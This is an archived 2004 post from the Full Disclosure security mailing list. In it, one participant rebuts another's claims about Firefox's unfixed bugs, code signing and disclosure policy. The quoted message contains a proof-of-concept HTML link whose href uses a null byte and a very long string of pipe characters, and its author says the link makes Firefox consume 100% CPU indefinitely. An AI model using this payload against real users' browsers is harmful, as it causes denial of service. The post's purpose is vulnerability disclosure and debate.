Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: To anybody who's offended by my disclosure policy-GET THIS GUYS
From: devis <devis () easynix net>
Date: Thu, 16 Dec 2004 16:04:35 +0100

Rafel Ivgi, The-Insider wrote:

SkyLined is a great dude. Scerious guy!
He is only worthy for RESPECT and no blame.
There is no signed law against releasing such information and its funny
someone is anyhow talking about this in
FULL-DISCLOSURE list, which its entire concept is to disclose full details
about vulnerabilities.

By the way, for all of FireFox fans....FireFox has many open vulnerabilities
which its vendor refuses to fix. Even after notifing
and even after 4 month :-)...Moreover, they are just like MS claiming
certain bugs are not bugs, talking "in the air" and without checking
and under-blowing risk values. They even don't sign their exe's(which is a
super minimal protection against man-in-the-middle replacing downloads) so
microsoft windows can't say its a valid file from a valid vendor and not a
virus.

For Example:
<a
href='http://theinsider.deep-ice.com/ctfmon.exe%00/hehe.exe.||||||||||||||||
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
||||||||||||||||||||||||||||||
'>test it</a>

This has no effect on I.E......
Will cause LooserFox, ahh sorry, FireFox to ***BURN ALL YOU CPU!!! 100%
FOREVER...***
What i am saying is, it is now who codes the software, it is how you do.
(if i was not in a job working frame, i would publishing things that will
cause you all to say its shit)
FireFox team claimed its an old bug.bla bla bla.and has no problem and no
security risk...bla bla bla... and didn't fix it after 4 month...
Just like MS when they are not even commercial, than what they are? on the
way to making money...to be the second size'd market share browser.

GO SKYLINED!

Rafel Ivgi, The-Insider
Security Consultant
Malicious Code Research Center (MCRC)
Finjan Software LTD
E-mail: rivgi () Finjan com
---------------------------------
Prevention is the best cure!
----- Original Message ----- From: "ph0enix" <ph0enix () ph0enix org>
To: "'Gadi Evron'" <ge () linuxbox org>
Cc: "'Berend-Jan Wever'" <skylined () edup tudelft nl>;
<full-disclosure () lists netsys com>
Sent: Saturday, November 27, 2004 5:56 PM
Subject: Re: [Full-disclosure] To anybody who's offended by my disclosure
policy

No software is immune from bugs. Explain exactly what point you are trying to prove here ? 4 month old bug ? Not being fixed ? Considering the age of code, how many bugs have been fixed, how fast they have done it, and how many spyware actually take advantage of the brillant bug you are posting ( known for ages....use bugzilla, and with no danger of remote code execution, just crash ), i think the track record of Firefox is quite exemplary. Please mention another popular browser with such track history....I let you search for a while.

Nobody said Firefox was immune from bugs, and your trolling doesn't reach far i am afraid. BTW whats the correlation with Skylined way of releasing security advisories ? Claiming the code base is 'shit' with 'if's' is once again defined as trolling in my world. So get real, the point is: - Despite having ( like all software ) some bugs, Firefox is WAYS WAYS WAYS safer than anything else on Bill Platform. No its is not a magic lock of ur MS box, and it may be owned by many other ways. Nobody said install firefox and relax, but its already a step forward compare to daily malware removal. More CPU needed ? sure, lets integrate it in Windows ala iexplore.exe ....

Finally to crush ur trolling, just do you understand what is a Digitally Signed MS app ? It is a lump of money you pay after forwarding your app to MS, and they will happily give u a receipt for your dollars stating that this app, on a stock XP install, will not crash your box. NOTHING MORE. As soon as you are out of the Stock Install, no more warranty are given. Basically its hype again, it does not possess nothing more than non digitally signed code. It is designed to have fools like you thinking they got something for their money. So with that light, i bet you can start to imagine why Firefox doesn't pay MS to digitally sign it, even so i bet MS will refuse it. And you are right, one day AV solutions will exclusively be based on digital signatures ( *EEEK* ) and soon:

"Norton 2010 has detected a virus on your system:  Firefox.win32"


Finjan ??? Sounds like someone at Redmond...
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault